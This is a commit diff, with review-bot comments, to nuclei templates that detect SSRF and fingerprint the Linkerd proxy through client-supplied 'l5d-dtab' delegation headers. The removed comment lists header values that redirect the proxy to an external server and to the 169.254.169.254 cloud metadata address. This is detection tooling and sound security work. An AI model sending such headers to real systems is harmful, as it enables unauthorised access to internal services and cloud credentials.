Merge pull request #2175 from shelld3v/patch-5

Fix false positive
patch-1
Sandeep Singh 2021-07-25 15:25:02 +05:30 committed by GitHub
commit c4fa0a9715
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 39 additions and 53 deletions


@ -1,67 +1,21 @@
id: linkerd-ssrf-detect
# Detect the Linkerd service by overriding the delegation table and
# inspect the response for:
# - a "Via: .. linkerd .."
# - a "l5d-err" and/or a "l5d-success" header
# - a verbose timeout error (binding timeout)
# - a full response
# The full-response case indicates a possible SSRF condition, the others
# only indicates the service presence.
#
# If a full-response is returned you should really manually probe requests with
# the following header values:
#
# - "l5d-dtab: /svc/* => /$/inet/yourserver.com/80", to get to other external hosts
# - "l5d-dtab: /svc/* => /$/inet/169.254.169.254/80", to get to cloud metadata
id: linkerd-ssrf-detection
info:
name: Linkerd SSRF detection
author: dudez
severity: info
tags: ssrf,linkerd
severity: high
tags: ssrf,linkerd,oob
reference: https://twitter.com/nirvana_msu/status/1084144955034165248
requests:
- method: GET
path:
- "{{BaseURL}}"
headers:
l5d-dtab: /svc/* => /$/inet/example.com/443
l5d-dtab: /svc/* => /$/inet/{{interactsh-url}}/443
matchers-condition: or
matchers:
- type: regex
name: via-linkerd-present
regex:
- '(?mi)^Via\s*?:.*?linkerd.*$'
part: header
- type: regex
name: l5d-err-present
regex:
- '(?mi)^l5d-err:.*$'
part: header
- type: regex
name: l5d-success-class-present
regex:
- '(?mi)^l5d-success-class: 0.*$'
part: header
- type: word
name: ssrf-response-body
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- '<p>This domain is for use in illustrative examples in documents.'
part: body
- type: regex
name: resolve-timeout-error-present
regex:
- '(?mi)Exceeded .*? binding timeout while resolving name'
part: body
- type: regex
name: dynbind-error-present
regex:
- '(?mi)exceeded .*? to unspecified while dyn binding'
part: body
- "http"
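Review bot: The new `info` block raises `severity` to `high` but has no `description`, and the header comment that explained what each kind of hit means is removed, so a finding no longer says what was actually confirmed. I would add under `info:` a line such as `description: Linkerd honoured a client-supplied l5d-dtab override and issued an outbound HTTP request to the supplied host.` The only remaining matcher accepts `http` in `interactsh_protocol`, which looks deliberate for the false-positive fix; a one-line comment that DNS-only interactions are intentionally not reported would stop someone loosening it later. For triage, the description could also point at the remediation: do not accept `l5d-*` context headers from untrusted clients (Linkerd 1.x has a `clearContext` server option for this, if I recall the name correctly).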


@ -0,0 +1,32 @@
id: linkerd-service-detect
info:
name: Linkerd Service detection
author: dudez
severity: info
tags: tech,linkerd
reference: https://twitter.com/nirvana_msu/status/1084144955034165248
requests:
- method: GET
path:
- "{{BaseURL}}"
headers:
l5d-dtab: /svc/* => /$/inet/example.com/443
matchers-condition: or
matchers:
- type: regex
regex:
- '(?mi)^l5d-err:.*$'
- '(?mi)^l5d-success-class: 0.*$'
- '(?mi)^Via\s*?:.*?linkerd.*$'
part: header
condition: or
- type: regex
regex:
- '(?mi)Exceeded .*? binding timeout while resolving name'
- '(?mi)exceeded .*? to unspecified while dyn binding'
part: body
condition: or
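Review bot: The two matchers in this new template have no `name`, unlike the matchers removed from the SSRF template, so a match no longer reports which indicator fired. Adding `name: linkerd-header` to the header matcher and `name: linkerd-binding-error` to the body matcher would restore that in the results. The request also still sends `l5d-dtab: /svc/* => /$/inet/example.com/443`, which asks the proxy to contact a third-party host from a template tagged `tech` with severity `info`. A comment above `headers:` such as `# override is sent only to provoke the l5d-err / binding-timeout response` would make the intent explicit for anyone running it against production.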